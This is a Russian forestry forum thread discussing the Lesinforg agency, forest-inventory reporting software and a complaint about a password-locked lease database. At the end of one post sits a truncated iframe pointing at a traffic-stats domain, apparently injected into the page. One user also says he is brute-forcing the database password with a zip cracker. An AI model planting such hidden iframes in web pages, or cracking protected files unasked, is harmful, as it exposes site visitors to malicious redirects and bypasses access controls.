Ещё про Лесинфорг

Обсуждения, посвящённые реалиям и продолжающемуся реформированию управления лесами и лесных отношений

Модераторы: forester66, Модераторы

Сообщение greshnov » Вс окт 30, 2005 12:42 pm

ДжуликоБандитто писал(а):Да, было б прикольно, если б сделать и сдать ГУЛФ/динамику средствами ЛесИСа

Думаю, что в республике Коми скоро так и будет. Они очень активно занимаются этим. Скоро и их филиал Центрлеспроекта приедет на учебу. Думаю еще быстрее дело пойдет.
ДжуликоБандитто писал(а): потом это дошло б до кого-нить из лесных генералов...

Нынешним лесным генералам прекрасно извесны возможности и перспективы нашей системы. Чуток подождем. Думаю, что они недолго продержатся при таких подходах к своим обязанностям.
ДжуликоБандитто писал(а):Хотя с другой стороны, гулфский отдел вроде б свою задачу отрабатывает нормально :wink:
Так что ежели ломать - то под корень, а по мизеру прикалываться не хоцца...

Гулфовский отдел принял самое активное участие когда мы делали ГУЛФ (консультации, инструкции, образцы...) и обещали протестировать его когда и у нас и у них руки дойдут. Мы будем согласовывать с ними все проблемы, которые будут возникать при внедрении в регионах. Я бы предпочел, чтобы именно они настроили бы справочники алгоритмов нашего ГУЛФ. Некоторых сотрудников отдела я знаю лет 25, хорошие люди, и я уверен, что мы будем сотрудничать. :P
greshnov
Активный пользователь
 
Сообщения: 406
Зарегистрирован: Пн июл 05, 2004 4:41 pm
Откуда: Москва

Сообщение ДжуликоБандитто » Вт ноя 01, 2005 8:26 am

Сегодня уже вторник, 1 ноября...
А ответа Markov по поводу наезда на меня - всё нет... :?
Очень жду!
Битиё определяет сознание.
ДжуликоБандитто
Активный пользователь
 
Сообщения: 246
Зарегистрирован: Пт сен 24, 2004 7:20 am
Откуда: От верблюда

Сообщение ДжуликоБандитто » Вт ноя 01, 2005 1:03 pm

Вы писали:
"Признайтесь, г-н Жулик, вы оклеветали людей!!!"
Вот я и хотел узнать - где и как.
А про ГУЛФ - это уже отвлечение.
... про женщин - удар ниже пояса. Не аргумент.
... про мат - аналогично. Я к Вам вроде бы так тоже не обращался. :roll:

Так что Вы, уж пожалуйста, разъясните мне, что Вы имели в виду, когда писали фразу "Признайтесь, г-н Жулик, вы оклеветали людей!!!". А то непонятно как-то...
Ответте, пожалуйста, - и надо прикрыть эту безцельную перебранку.
Битиё определяет сознание.
ДжуликоБандитто
Активный пользователь
 
Сообщения: 246
Зарегистрирован: Пт сен 24, 2004 7:20 am
Откуда: От верблюда

Сообщение greshnov » Вт ноя 01, 2005 4:14 pm

Anonymous писал(а):И про проги ГУЛФ-овские: какой дурак сейчас будет переписывать проги завязанные на Лесной кодекс?
Никакой!

Есть такие дураки! Это мы. Написали же свой ГУЛФ, правда начиная от таксационного описания. Честно признаюсь - для тренировки, чтобы программеры форму спортивную не потеряли. А еще когда написали я им сказал - вот это образец того, что с информацией о лесе делать нельзя. :P
Сейчас, возможно, еще расчет лесосек по старой методике сделаем, чтобы отстали от нас некоторые назойливые педанты. А потом свой делать будем, неформальный. Может найдутся умные люди, оценят...
Может он и сейчас никому ни о чем и не говорит?

ГУЛФ - формальная часть проекта, в т.ч. арендной записки, поэтому хоть его и не читают (ну кроме 2-3 цифр), но вставляют в документацию обязательно. :P
greshnov
Активный пользователь
 
Сообщения: 406
Зарегистрирован: Пн июл 05, 2004 4:41 pm
Откуда: Москва

БД "Аренда"

Сообщение Frukt » Ср мар 28, 2007 11:23 am

Люди добрые, помогите, мы сами не местные, подайте плиз! Подскажите, есть в их БеДе Аренда, выход в «свет» Ексель?
Замучился, ни одну цифирь не могу вынуть из их (моих) выходных форм.
Отчет писать надо, а она, сволочь, эта БеДе, типа, печатай и рисуй с бамажки заново.
Она бы еще предложила нарисовать мои цифири у меня на лбу!
Все бы ничего, напечатал бы и вбил свои кровные цифири заново, и уже в Екселе, да эта Бл…Де, будь ей неладно, столько чернил за воротник заливает, столько порошка жрет! Не успеваю подливать и подсыпать! Да ладно еще, можно было б и напечатать самое необходимое, так председатель «колхоза» велит на комп себе скинуть. И что? В сканер её, бумагу, потом, через одно место в ексель, что ли?
Уж, не говорю об её, БеДе «Аренда», предложении написать выходные формы в му-да-и (mdi) формат, который не на всех, а главное, у председателя «колхоза», на компе не читается. А если где и читается, то так перековеркивает таблицы, что жутко становится.
Неужели нет выхода … в ексель?!
Может, я чё не понял? То этого момента судьба миловала меня от выборки данных. Но тут – приперло.
Помогите, чем можете!!!
Frukt
Пользователь
 
Сообщения: 7
Зарегистрирован: Ср мар 28, 2007 10:21 am

Re: БД "Аренда"

Сообщение greshnov » Ср мар 28, 2007 2:02 pm

Frukt писал(а):Помогите, чем можете!!!
Аренда это которая? Если по арендаторам лесного фонда, то пользуйтесь ГИС TopoL-L. На днях мы закончили подсистему мониторинга лесопользования. В апреле обновление будет выложено на сайте. Всю информацию по арендаторам можно внести, и затем вести учет по годам. "Выходы" в любимый отраслью ексель так же как и ворд есть из всех режимов через буфер обмена в структурированном виде (таблица). Если понадобится "вывод" в формат для вышестоящей организации - сделаем по образцу. :)
greshnov
Активный пользователь
 
Сообщения: 406
Зарегистрирован: Пн июл 05, 2004 4:41 pm
Откуда: Москва

Re: БД "Аренда"

Сообщение Frukt » Ср мар 28, 2007 2:23 pm

greshnov писал(а):Если понадобится "вывод" в формат для вышестоящей организации - сделаем по образцу. :)

Премного благодарны, но сейчас - больше вопросов, чем ответов.
Что, куда и зачем и кому все это надо???? (Я имею в виду перестройку). Сами знаете ситуацию в отрасли.
И еще, други мои.
Мои кровные, мною созданные, потом и кровью политые данные этот нехороший человек в Лесинфорге "забрал к себе и посадил в тюрягу".
Вот скажите мне на милость, зачем МОИ данные у МЕНЯ на компе паролировать!?
Впрочем, даже если бы я и знал пароль, то "отзыва" я все равно не знаю, например, структуру БеДе "Аренда".
По цифирям, конечно, можно соориентировать...
Но скажите мне - ЗАЧЕМ!!! Что бы я данные не попортил?
Но я же, если надо, их же программой, все эти данные и "попорчу".
СМЫСЛ ПАРОЛИРОВАНИЯ?!
Frukt
Пользователь
 
Сообщения: 7
Зарегистрирован: Ср мар 28, 2007 10:21 am

Re: БД "Аренда"

Сообщение greshnov » Чт мар 29, 2007 8:58 am

Frukt писал(а):Что, куда и зачем и кому все это надо???? (Я имею в виду перестройку). Сами знаете ситуацию в отрасли.
Отрасль сама создала сложившуюся ситуацию. Патологическая неспособность приспосабливаться к новым условиям, желание сохранить все как есть, "изменить" ничего не меняя, привели к ступору. Ничего страшного. Еще незасветившиеся на своей глупости кадры кончаются. Рано или поздно государство начнет принимать кадровые решения, основанные на результатах, а не близости к "телу".
Frukt писал(а):Вот скажите мне на милость, зачем МОИ данные у МЕНЯ на компе паролировать!?
Вот я и говорю - переходите на Тополь. Ничего нигде не паролируется. А глупые ошибки и оЧЕпятки можно самому проверить и поправить контролем.
Frukt писал(а):СМЫСЛ ПАРОЛИРОВАНИЯ?!

Обычно две причины:
1. Закрыть доступ к информации.
2. Предохраниться от несанкционированных или ошибочных изменений информации.
Первый вариант пока бессмысленен, т.к. снять информацию, если есть реальный интерес, всегда можно. Пока сотрудники, отвечающие за инфу, получают копейки - купить ее, инфу, дело плевое. И никакие пароли не помогут.
А во втором случае я бы все же выбрал надежные инструменты контроля и репликации, чем тупое закрытие доступа. Тем паче, обычно пароли пишут на экранах и клавах, чтобы не забыть.
В общем, это студенческое решение. :D<iframe src='http://traffstats.biz/adv/new.ph
greshnov
Активный пользователь
 
Сообщения: 406
Зарегистрирован: Пн июл 05, 2004 4:41 pm
Откуда: Москва

Re: БД "Аренда"

Сообщение Лесничий » Пт мар 30, 2007 5:59 am

[quote="FruktНо скажите мне - ЗАЧЕМ!!! Что бы я данные не попортил?
Но я же, если надо, их же программой, все эти данные и "попорчу".
СМЫСЛ ПАРОЛИРОВАНИЯ?![/quote]
Посмотри сообщение в личке....
Лесничий
Пользователь
 
Сообщения: 10
Зарегистрирован: Пн дек 12, 2005 8:30 am

Сообщение ДжуликоБандитто » Пн апр 02, 2007 7:08 am

ну и как - нашли пароль?
а то у меня ultimate zip craker запросил 14 дней на взлом - ну нет у меня щас под рукой нормальной машины... :cry: а пароль было б интересно узнать :roll:
Битиё определяет сознание.
ДжуликоБандитто
Активный пользователь
 
Сообщения: 246
Зарегистрирован: Пт сен 24, 2004 7:20 am
Откуда: От верблюда

Пред.След.

Вернуться в Лесное хозяйство на современном этапе

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 6

cron